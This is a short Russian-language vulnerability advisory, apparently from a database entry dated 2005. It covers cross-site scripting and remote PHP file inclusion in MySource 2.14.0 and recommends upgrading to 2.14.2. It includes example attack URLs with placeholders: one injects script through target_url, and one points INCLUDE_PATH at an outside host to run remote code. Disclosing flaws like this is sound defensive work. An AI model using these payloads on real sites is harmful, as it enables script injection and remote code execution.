Дата публикации: | 20.10.2005 |
Всего просмотров: | 1462 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: MySource 2.14.0
Описание: 1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=">[code] 2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Примеры:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]? Для удачной эксплуатации уязвимостей должна быть включена опция register_globals URL производителя: mysource.squiz.net Решение: Установите последнюю версию (2.14.2) с сайта производителя. Источник: |
|
Ссылки: | MySource Cross-Site Scripting and File Inclusion Vulnerabilities |